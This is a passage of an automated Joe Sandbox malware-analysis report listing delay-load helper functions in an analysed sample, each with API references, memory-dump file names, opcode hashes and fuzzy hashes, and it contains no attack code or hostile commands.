                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 4c000d0f8a603ccef944cbcc232d8f32fc1102136c49afa02b5f69a6d0c4aa46
                                                              • Instruction ID: 6127774796292b3819478daa019a372f3762e1c554aaa3c256900184664fbc8f
                                                              • Opcode Fuzzy Hash: 4c000d0f8a603ccef944cbcc232d8f32fc1102136c49afa02b5f69a6d0c4aa46
                                                              • Instruction Fuzzy Hash: 1BB0929125A100EC210862471946D3B010CC088F16730942FB805C11C1A858A90A093A
                                                              Function 0043E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: d84a2db33e0da509d74d04442136b3c38795ba61e09881258675da6a37e2ed7b
                                                              • Instruction ID: 44ae5748206ceeaeffd5b4c7fd98d9b26e0cb449a53e8fd721f2965a345a817b
                                                              • Opcode Fuzzy Hash: d84a2db33e0da509d74d04442136b3c38795ba61e09881258675da6a37e2ed7b
                                                              • Instruction Fuzzy Hash: 62B092A125A100FC210865471806D3B010DC089F16730942FBC05C10C1E848A905093A
                                                              Function 0043E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 17398b48b1478b1893e193504a5bf89e8c397b7f4966f4efbefbbe975e142cd3
                                                              • Instruction ID: 57d26c0fba0473a277328b8a4c84cf3623d53eb7c03992ccd48be38b31ceb4a3
                                                              • Opcode Fuzzy Hash: 17398b48b1478b1893e193504a5bf89e8c397b7f4966f4efbefbbe975e142cd3
                                                              • Instruction Fuzzy Hash: D6B012E125A200FC314875475C06D3B010DC0C8F16B30953FFC05C10C1E84CAD450A3E
                                                              Function 0043E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: c2f2a5ac5a7e391b37c310c88220d45973a2e8274ded551975a0527f5c925a2d
                                                              • Instruction ID: 98b97327ad6c7b358eec2d3cbb2ac62e8e87807a4f9a56d8b412596588ee2341
                                                              • Opcode Fuzzy Hash: c2f2a5ac5a7e391b37c310c88220d45973a2e8274ded551975a0527f5c925a2d
                                                              • Instruction Fuzzy Hash: 39B012E125A100FC310875471D46D3B010DC0C8F16730943FFC05C10C1EC4CAE06093E
                                                              Function 0043E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 5b43ee372049f906cab0eea5e75286d396450fe577640793498f432cf3ac4fc3
                                                              • Instruction ID: 994423528572f42f18e5cc2e96c7920854afe4b82d5088955c5afa5f2a92cc5e
                                                              • Opcode Fuzzy Hash: 5b43ee372049f906cab0eea5e75286d396450fe577640793498f432cf3ac4fc3
                                                              • Instruction Fuzzy Hash: CFB012E125A100FC310875471C06D3B010DC0C8F16730943FFC05C10C1E84CAD05093E
                                                              Function 0043EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043EAF9
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 3Ro
                                                              • API String ID: 1269201914-1492261280
                                                              • Opcode ID: d4004a69718fe9e8fe3ef1a2e85ef569edccb84228dc04c4063ecddf94cc62e5
                                                              • Instruction ID: 90beba6cfb9848f3170c3fd48033ea9bbbfd76181353476a805dfa5fe219a29d
                                                              • Opcode Fuzzy Hash: d4004a69718fe9e8fe3ef1a2e85ef569edccb84228dc04c4063ecddf94cc62e5
                                                              • Instruction Fuzzy Hash: 63B012C629B142BC310872071D42C3B010CC0C5F96730E42FF800C80C2DC8C0D07083E
                                                              Function 0043E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 838f991f5d5c69fc117ff885fd78958b07f5f4b2325ae156db09f586396545c1
                                                              • Instruction ID: d773eb43e62459701e4622e5b03874a6a7689ec97d58d3e586df9fd09cd4b15e
                                                              • Opcode Fuzzy Hash: 838f991f5d5c69fc117ff885fd78958b07f5f4b2325ae156db09f586396545c1
                                                              • Instruction Fuzzy Hash: 01B092A125A100EC2108A1471946D3B018CC088F16B30942FB805C10C1A848A906093A
                                                              Function 0043E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDu<C
                                                              • API String ID: 1269201914-3993865770
                                                              • Opcode ID: e0fed94f1e265b979358ea3362cb62e5ede5d990cfae9ccea2971710f810fe0c
                                                              • Instruction ID: ad431b5e1d19c9211bc5a6119496c8e1ca6b2973d068eebe2d9b82dda4debb36
                                                              • Opcode Fuzzy Hash: e0fed94f1e265b979358ea3362cb62e5ede5d990cfae9ccea2971710f810fe0c
                                                              • Instruction Fuzzy Hash: 9BB012C165A200BC3208714B9C03D3F010CC0CAF1E730A62FF814C10C1E94D0D89193E
                                                              Function 0043E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDu<C
                                                              • API String ID: 1269201914-3993865770
                                                              • Opcode ID: 82ffc0e2221a910be7b9963303a0e1a319d7369c1de94a88bf8d36c3d387628e
                                                              • Instruction ID: 6d27bd7f4e81ba52080c2234e6e5b4b45fc3c5aed59392936cd738b0c248207b
                                                              • Opcode Fuzzy Hash: 82ffc0e2221a910be7b9963303a0e1a319d7369c1de94a88bf8d36c3d387628e
                                                              • Instruction Fuzzy Hash: 53B012C165A100BC310831671C06D3F010CC0C6F1EB30A43FFC20C04C2A84C0E49083E
                                                              Function 0043E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: FjunC
                                                              • API String ID: 1269201914-662778638
                                                              • Opcode ID: f09ce20d06d19db3d907bbd693986b1952db7c9ae1f8c7228c741d4f58fbd045
                                                              • Instruction ID: 761752fcc748be819cc2da8bfdbf26f5a6adb99ea49bd4f2a46ddb600e8c0047
                                                              • Opcode Fuzzy Hash: f09ce20d06d19db3d907bbd693986b1952db7c9ae1f8c7228c741d4f58fbd045
                                                              • Instruction Fuzzy Hash: 65B012C165A100BD310871971C06D3B014CC0C8F1A730A42FF804C20C1E84C0D05193E
                                                              Function 0043E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: FjunC
                                                              • API String ID: 1269201914-662778638
                                                              • Opcode ID: a4dce14e65603bf6bcba94acf3175e7ce417f6bda846abc9c84c375310dc9162
                                                              • Instruction ID: 8ab9c2e631b9bc6be988c17a9ed8c95850283eec8939588e4464d9177b9bc938
                                                              • Opcode Fuzzy Hash: a4dce14e65603bf6bcba94acf3175e7ce417f6bda846abc9c84c375310dc9162
                                                              • Instruction Fuzzy Hash: B8B012C165A100BC310871D75D46D3B015CC0C8F1A730A62FF804C20C1ED4C0E06093E
                                                              Function 0043E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: FjunC
                                                              • API String ID: 1269201914-662778638
                                                              • Opcode ID: 18d907751d56aa054ac9dc2c19e72e6e0b8b6fa804951d4dcdc8d086934ea5d5
                                                              • Instruction ID: 2a083ac33bf98296aaab118ef4cf89bc4728391b7cfac9c99fc56783d5f40b31
                                                              • Opcode Fuzzy Hash: 18d907751d56aa054ac9dc2c19e72e6e0b8b6fa804951d4dcdc8d086934ea5d5
                                                              • Instruction Fuzzy Hash: F9B012C165A200BC314871979C07D3B015CC0C8F1A730A62FF804C20C1E94C0D450A3E
                                                              Function 0043E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: e381a07fe184f5364b7dbb75882e5f039f6867ef67611ced36ab2a496320ebcd
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: e381a07fe184f5364b7dbb75882e5f039f6867ef67611ced36ab2a496320ebcd
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 3a8bab57e7b02f6edaebdc728751b66e987024b98c66b74e22e0319d0e3e3bf8
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 3a8bab57e7b02f6edaebdc728751b66e987024b98c66b74e22e0319d0e3e3bf8
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
